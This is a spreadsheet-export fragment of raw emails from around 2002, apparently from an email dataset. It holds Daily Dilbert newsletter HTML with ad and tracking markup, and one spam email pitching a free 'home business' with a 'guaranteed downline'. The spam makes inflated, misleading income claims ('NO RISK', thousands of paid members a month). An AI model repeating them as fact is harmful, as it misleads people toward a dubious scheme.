 unitedmedia.com:80/Click?q=3D99-4mayQAdljI46v3V2HHfS87c8B9RR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dae=
 -jOB6QMB3Lkla1638-1hV197zDRRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc3=
 -x1sCQJLo-_UJLoWZ57n0NcndxRRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dd8-XWY3QWL=
 ZI7jgIznmkkW6f-kQVsRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3Ded-jLFvQgVY7SUDUVPxvHo6d2BfGsRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D02-qit9IljN-SKgl1S_XDuuQWJBb9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D17-agrtnIXceK4IaDZZIy4FChI4"&gt;
 --24851503.1027162641507.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You have nothing to loose anlt to gain-Get 220 Multi-Billion Stores.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;&lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Home Based Business&lt;/TITLE&gt;
   &lt;META NAME="GENERATOR" CONTENT="MSHTML 6.00.2715.400"  &gt;
   &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=unicode"&gt;
   &lt;META NAME="description" CONTENT="Having your own business will allow you to work at home, and you can start building your residual income right now."&gt;
   &lt;META NAME="robots" CONTENT="index all, follow all" &lt;META&gt;
   &lt;META NAME="revisit-after" CONTENT="15 days"&gt;
   &lt;META NAME="Author" CONTENT="fwr"&gt;
 &lt;STYLE type=text/css&gt;
   &lt;!--
 a:hover { color:#cc0000; font-type:bold }
 H1      { color:#006699 }
   --&gt;
 &lt;/STYLE&gt;
 &lt;FORM&gt;&lt;/FORM&gt;
 &lt;FORM ACTION="http://www.eprofitzone.biz/cgi-bin/formmail.pl" METHOD="post" ENCTYPE="x-www-form-urlencoded"&gt;
 &lt;INPUT TYPE="hidden" NAME="recipient" VALUE="enews-freestores@mailnewyork.com"&gt;
 &lt;INPUT TYPE="hidden" NAME="subject" VALUE="Join Free"&gt;
 &lt;INPUT TYPE="hidden" NAME="required" VALUE="realname, email"&gt;
 &lt;INPUT name="env_report" type=hidden value=REMOTE_ADDR&gt;
 &lt;INPUT name="print_config" type="hidden" value=email,realname&gt;
 &lt;input type="hidden" name="redirect" value="http://www.expage.com/joinfree2"&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH="440" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
   &lt;TR&gt;
     &lt;TD WIDTH="30%"&gt;
       &lt;P align=left&gt;
       &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;P align=left&gt;&lt;IMG SRC="http://members.aol.com/musworld/stores.gif"
       ALIGN="bottom"&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD WIDTH="70%"&gt;
       &lt;P align=left&gt;&lt;DIV align=left&gt;&lt;FONT COLOR="#ff0000"&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT COLOR="#990000"
        SIZE="+2" FACE="Verdana"&gt;&lt;STRONG&gt;&lt;FONT color=#0000ff&gt;Join For
       Free!&lt;/FONT&gt;&lt;/STRONG&gt;   &lt;BR&gt;&lt;FONT
       color=#ff0000&gt;
       Guaranteed Downline!&lt;BR&gt;&lt;/FONT&gt;&lt;STRONG&gt;&lt;FONT color=#0000ff&gt;Great
       Income!&lt;/FONT&gt;&lt;/STRONG&gt;
        &lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;CENTER&gt;&lt;TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0"
  WIDTH="90%"&gt;
   &lt;TR&gt;
     &lt;TD VALIGN="top"&gt;
       &lt;P&gt;&lt;FONT FACE="Verdana"&gt;&lt;IMG SRC="http://members.aol.com/musworld/timeclock1.gif"
       HSPACE="10" ALIGN="left" ALT="Having your own business will allow you to work at home, and you can start building your residual income right now."
       WIDTH="109"
       HEIGHT="135"
       NATURALSIZEFLAG="0"&gt;&lt;FONT size=2&gt;&lt;FONT
       color=#0000a0&gt;You have found the &lt;STRONG&gt;#1 home business&lt;/STRONG&gt;
          and your timing could not be better!&amp;nbsp; &lt;BR&gt;
       Are you
       tired of punching a timeclock for someone else?&amp;nbsp; Had enough of your
       job?&amp;nbsp;&amp;nbsp;
       Do you truly want the freedom that comes from having a successful
       residual income business? &lt;BR&gt;&lt;/FONT&gt;
       &lt;B&gt;&lt;FONT color=#0000a0&gt;Then this
       &lt;/FONT&gt;&lt;FONT color=#ff0000&gt;Home Business&lt;/FONT&gt;  &lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT color=#0000a0&gt;&lt;FONT FACE="Verdana"&gt;&lt;FONT size=2&gt; is what you're looking
       for&lt;/FONT&gt;     !&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
       FACE="Verdana"&gt;&lt;BR&gt;
 &lt;BR&gt;
       &lt;IMG SRC="http://members.aol.com/musworld/quit1.gif" ALIGN="right"
       ALT
       ="Having your&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;&amp;#13;&amp;#10;
       own business will allow you to work at home, and you can start building your residual income right now."
       WIDTH="150" HEIGHT="145"
       NATURALSIZEFLAG="0"&gt;&lt;FONT color=#0000a0
       size=2&gt;Thousands of people just like you have started their own home-based
       business and said goodbye to their jobs.&amp;nbsp; Would you like to be
       affiliated with &lt;/FONT&gt;
        &lt;/FONT&gt;&lt;FONT COLOR="#0000a0" FACE="Verdana" size=2
      &gt;&lt;STRONG&gt;CDUniverse.com&lt;/STRONG&gt;,
       &lt;STRONG&gt;Microsoft&lt;/STRONG&gt;, &lt;STRONG&gt;Sears&lt;/STRONG&gt;,&lt;STRONG&gt;ConsumerWarehouse.com&lt;/STRONG&gt;,
       &lt;STRONG&gt;KBKids.com&lt;/STRONG&gt;, &lt;STRONG&gt;OfficeMax.com&lt;/STRONG&gt;,
       &lt;STRONG&gt;Walmart.com&lt;/STRONG&gt; and &lt;STRONG&gt;Dell.com&lt;/STRONG&gt;
        ,&lt;/FONT&gt;&lt;FONT FACE="Verdana"&gt;&lt;FONT color=#0000a0 size=2&gt; &lt;STRONG&gt;ToysRus.com&lt;/STRONG&gt;, just to name a few?
       There are&amp;nbsp;more than 220 Stores.&amp;nbsp;&lt;FONT color=#ff0000&gt;
                &lt;STRONG&gt;Own
       a piece of all these Multi-Billion Dollar Stores&lt;/STRONG&gt; . &lt;FONT color=#0000a0&gt;You
       always get Rebates when shop from your own stores
           online.&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;BR&gt;
       &amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT FACE="Verdana"&gt;&lt;IMG SRC="http://members.aol.com/musworld/boss1.gif"
       ALIGN="left" ALT="Having your own business will allow you to work at home, and you can start building your residual income right now."
       WIDTH="135" HEIGHT="119"
       NATURALSIZEFLAG="0"&gt;&lt;FONT color=#0000a0 size=2&gt;With
       your&amp;nbsp; &lt;STRONG&gt;  home business&lt;/STRONG&gt;, you can be your own boss,
       set your own hours and determine the amount of income you want to
       earn.&amp;nbsp; Thousands of members worldwide are &lt;STRONG&gt;
           earning &lt;U&gt;substantial&lt;/U&gt; incomes&lt;/STRONG&gt;  with
       this proven home business, so the potential to be financially
       independent is here waiting for you.&amp;nbsp; What's more, everyone
       who joins is on the same success team. We all build our business
       together!&lt;BR&gt;&lt;/FONT&gt;
 &lt;BR&gt;
       &amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT FACE="Verdana"&gt;&lt;IMG SRC="http://members.aol.com/musworld/hug1.gif"
       ALIGN="right" ALT="Having your own business will allow you to work at home, and you can start building your residual income right now."
       WIDTH="124" HEIGHT="135"
       NATURALSIZEFLAG="0"&gt;&lt;FONT color=#0000a0
       size=2&gt;&lt;STRONG&gt;There is a freedom you'll enjoy in owning your own home
       business.&lt;/STRONG&gt;&amp;nbsp;"&lt;FONT
       color=#ff0000&gt;Quality&lt;/FONT&gt;" family time can include "&lt;FONT
       color=#ff0000&gt;quantity&lt;/FONT&gt;
           " as well.&amp;nbsp; Lack
       of money can be a thing of the past as you enjoy life to its
       fullest!&lt;BR&gt;&lt;/FONT&gt;
       &lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT FACE="Verdana"&gt;&lt;FONT
       color=#0000a0 size=2&gt;In order for you to see how our network
       referral development plan works, we have created a &lt;B&gt;FREE introductory
       program&lt;/B&gt; called Postlaunch. As
       a&amp;nbsp;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;Free Member&lt;/STRONG&gt;&lt;/FONT&gt;       , you are
       given a position in our network &lt;B&gt;&lt;U&gt;at no cost to you and without
       any obligation&lt;/U&gt;&lt;/B&gt;.
       We want you to see just how good this Home Business really is without risking a
       penny&lt;/FONT&gt;!
       &lt;/FONT&gt;&lt;/P&gt;&lt;CENTER&gt;&lt;TABLE BORDER="1" CELLSPACING="3" CELLPADDING="3"
       BGCOLOR="#0abbc0"&gt;
         &lt;TR&gt;
           &lt;TD ALIGN="middle" BGCOLOR="#ffcccc"&gt;&lt;FONT SIZE="+1" FACE="Verdana"&gt;&lt;FONT color=#0000a0&gt;Have
             Your Downline Built BEFORE You Spend Any Money! &lt;BR&gt;
             This program even offers you a &lt;B&gt;proven way to build a business
             &lt;/B&gt;and&lt;/FONT&gt;
             &lt;FONT color=#0000a0&gt;a &lt;/FONT&gt;  &lt;BR&gt;
             &lt;/FONT&gt;&lt;B&gt;&lt;FONT COLOR="#cc0000" SIZE="+1" FACE="Verdana"&gt;GUARANTEED
             DOWNLINE!!&lt;/FONT&gt;&lt;/B&gt;&lt;FONT FACE="Verdana"&gt; &lt;BR&gt;&lt;FONT
             color=#0000a0&gt;
             Don't miss out on this Great Opportunity to secure yourself &lt;BR&gt;&lt;STRONG&gt;An Outstanding Monthly
             Residual Income&lt;/STRONG&gt;&lt;/FONT&gt;
                 &lt;/FONT&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD ALIGN="middle" BGCOLOR="#ffcccc"&gt;&lt;B&gt;&lt;FONT SIZE="+1" FACE="Verdana" color=#0000a0&gt;It's
             FREE to join our Post Launch Program&lt;/FONT&gt;&lt;/B&gt;&lt;FONT FACE="Verdana"&gt;&lt;BR&gt;&lt;FONT color=#0000a0&gt;
             Your FREE membership # will also be entered into a lucky drawing
 &lt;BR&gt;to WIN
             $100 to shop online!&lt;/FONT&gt;
                  &lt;/FONT&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD ALIGN="middle" BGCOLOR="#ffcccc"&gt;&lt;B&gt;&lt;FONT FACE="Verdana" color=#0000a0 size=2
            &gt;ALL
             new members who join after you will be placed in &lt;BR&gt;
             ONE Straight Line down UNDER you.&lt;/FONT&gt;&lt;/B&gt;&lt;FONT FACE="Verdana" color=#0000a0 size=2
            &gt;
 &lt;BR&gt;
             YOU can easily get 1000 - 3000 paid VIP members under your position
             in a month! &lt;BR&gt;
             &lt;/FONT&gt;&lt;FONT FACE="Verdana" color=#0000a0
            &gt;&lt;STRONG&gt;There is absolutely &lt;FONT
             color=#ff0000&gt;NO RISK&lt;/FONT&gt;
               to get involved and &lt;BR&gt;&lt;FONT color=#ff0000&gt;
             &lt;U&gt;NO COST&lt;/U&gt; to join our Post Launch
         Program.&lt;/FONT&gt;&lt;/STRONG&gt;      &lt;/FONT&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD ALIGN="middle" BGCOLOR="#ffffff"&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT
             color=#0000ff&gt;&lt;FONT SIZE="+2" FACE="Verdana"&gt;To sign up &lt;/FONT&gt;&lt;FONT
              SIZE="+2" FACE="Verdana" &gt;FREE:&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P ALIGN=left&gt;&lt;FONT FACE="Verdana" color=#0000ff
            &gt;Type your &lt;FONT color=#ff0000&gt;FIRST&lt;/FONT&gt;
             &amp;amp; &lt;FONT color=#ff0000&gt;LAST name&lt;/FONT&gt;
                here:&lt;/FONT&gt;&lt;FONT SIZE="+1" FACE="Arial"&gt;&lt;STRONG&gt; &lt;/STRONG&gt; &lt;INPUT
             NAME="realname" SIZE="30"&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;P ALIGN=left&gt;&lt;FONT FACE="Verdana" color=#0000ff
            &gt;Type your &lt;FONT color=#ff0000&gt;email
             address&lt;/FONT&gt;
              here:&lt;/FONT&gt;&lt;FONT SIZE="+1" FACE="Arial"&gt;&lt;STRONG&gt; &lt;/STRONG&gt; &lt;INPUT NAME="email"
             SIZE="30"&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT SIZE="+2" FACE="Arial"&gt;&lt;FONT color=#0000ff&gt;THEN CLICK
             HERE&lt;/FONT&gt;  &amp;nbsp;&lt;INPUT
             NAME="action" TYPE="submit" VALUE="Join Free!"&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT color=#ff0000&gt;&lt;FONT face=Arial size=1&gt;By getting a free
             membership, you agree to receive emails about the&amp;nbsp;consumer and
             business opportunities.&lt;/FONT&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;
           &lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD ALIGN="middle" BGCOLOR="#aabbcc"&gt;&lt;FONT COLOR="#000000" SIZE="+2"&gt;&lt;FONT color=#0000a0&gt;You
             have nothing to lose and potentially a lot to gain.&lt;/FONT&gt;
                       &lt;BR&gt;
             &lt;/FONT&gt;&lt;FONT COLOR="#cc0000" SIZE="+3"&gt;Join Now!&lt;BR&gt;
             &lt;/FONT&gt;&lt;FONT COLOR="#0000a0" SIZE="+2"&gt;We will confirm your position
             and send you &lt;BR&gt;
             a special report right away.&lt;BR&gt;&lt;FONT color=#ff0000&gt;There is no
             cost and no obligation.&lt;/FONT&gt;
                   &lt;/FONT&gt;&lt;/TD&gt;
         &lt;/TR&gt;
       &lt;/TABLE&gt;&lt;BR&gt;&lt;/CENTER&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;&lt;/CENTER&gt;&lt;CENTER&gt;&lt;BR&gt;&lt;FONT
  color=#8f8f8f&gt;&amp;nbsp;&lt;FONT color=#7f7f7f&gt;"People are allways blaming their
 circumstances for &lt;BR&gt;what they are. The people who get on this world
 are&lt;BR&gt;they who get up and look for the circustances they want,&lt;BR&gt;and, if they
 can't find them, make them"&lt;BR&gt;&lt;/FONT&gt;&lt;STRONG&gt;By Goerge Bernard
 Shaw&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/CENTER&gt;
 &lt;CENTER&gt;&lt;FONT color=#7f7f7f&gt;"There are risks and costs to a program of action.
 But&lt;BR&gt;they are far less than the long-range risks and costs of&lt;BR&gt;comfortable
 inaction" &lt;/FONT&gt;&lt;/CENTER&gt;
 &lt;CENTER&gt;&lt;FONT color=#8f8f8f&gt;&lt;STRONG&gt;By John F.
 Kennedy&lt;BR&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/CENTER&gt;&lt;CENTER&gt;
 &lt;BR&gt;&lt;FONT color=#8f8f8f&gt;&lt;FONT size=2&gt;&lt;FONT color=#7f7f7f&gt;Per
 the proposed H.R. 3113 Unsolicited Commercial Electronic &lt;BR&gt;Mail Act of 2000,
 further transmissions to you by the sender &lt;BR&gt;may be stopped at NO COST to you
 by&lt;/FONT&gt; &lt;/FONT&gt;&lt;A href="mailto:pleaseno@121freemail.com"&gt;&lt;FONT
  color=#7f7f7f&gt;&lt;STRONG&gt;&lt;FONT size=2&gt;Clicking Here to REMOVE.&lt;/FORM&gt;&lt;!-- START HOME FREE FOOTER CODE --&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/CENTER&gt;
 &lt;/BODY&gt;
 &lt;!-- A home business will allow you to work at home and with the many varied home-based businesses available, you are sure to find a home business that will work for you. --&gt;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</si>
  <si>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Your Daily Dilbert 07/19/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--16551393.1027075822193.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --16551393.1027075822193.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3Da1-AfwtQ-ZzMEbMMueGklHlcPOSs9RR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3Dcb-CjiIQJsXcgmF0O5yXJHXeQeFhRRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
